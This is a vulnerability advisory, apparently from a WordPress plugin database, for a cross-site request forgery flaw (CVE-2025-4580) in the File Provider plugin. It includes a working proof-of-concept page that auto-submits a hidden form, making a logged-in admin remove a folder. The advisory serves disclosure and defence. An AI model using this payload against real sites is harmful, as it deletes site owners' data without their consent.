File Provider <= 1.2.3 – Item Deletion via CSRF | CVE 2025-4580 | Plugin Vulnerabilities

Description

The plugin does not have CSRF check in place when updating its settings, which could allow attackers to make a logged in admin change them via a CSRF attack

Proof of Concept

Make an admin open:

```
<!DOCTYPE html>
<html lang="en">
<head>
  <meta charset="UTF-8">
  <title>Auto Submit Form</title>
</head>
<body onload="document.forms[0].submit();">
  <form action="https://example.com/wp-admin/options-general.php?page=file-provider-options" method="POST">
    <input type="hidden" name="folder_id" value="1">
    <input type="hidden" name="option" value="remove">
  </form>
</body>
</html>
```

Replace the Folder ID value with a valid ID

Affects Plugins

No known fix

References

CVE

Classification

Type

CSRF

OWASP top 10

A2: Broken Authentication and Session Management

CWE

CVSS

Miscellaneous

Original Researcher

Bob Matyas

Submitter

Bob Matyas

Submitter website

https://www.bobmatyas.com

Submitter twitter

Verified

Yes

WPVDB ID

8741353a-2a7f-4dee-b62d-7f5fe435f1a1

Timeline

Publicly Published

2025-05-14 (about 7 months ago)

Added

2025-05-14 (about 7 months ago)

Last Updated

2025-05-14 (about 7 months ago)

Other

Published

Title

Published

2024-05-30

Title

ActiveDEMAND < 0.2.44 - Cross-Site Request Forgery

Published

2024-12-12

Title

Gaxx Keywords <= 0.2 - Cross-Site Request Forgery to Cross-Site Scripting

Published

2024-10-15

Title

File Manager Pro < 8.3.10 - Cross-Site Request Forgery to Arbitrary File Upload

Published

2023-07-17

Title

FiveStarPlugins Restaurant Menu and Food Ordering < 2.4.7 - Cross-Site Request Forgery

Published

2025-01-03

Title

BSK Forms Blacklist < 4.0 - SQLi via CSRF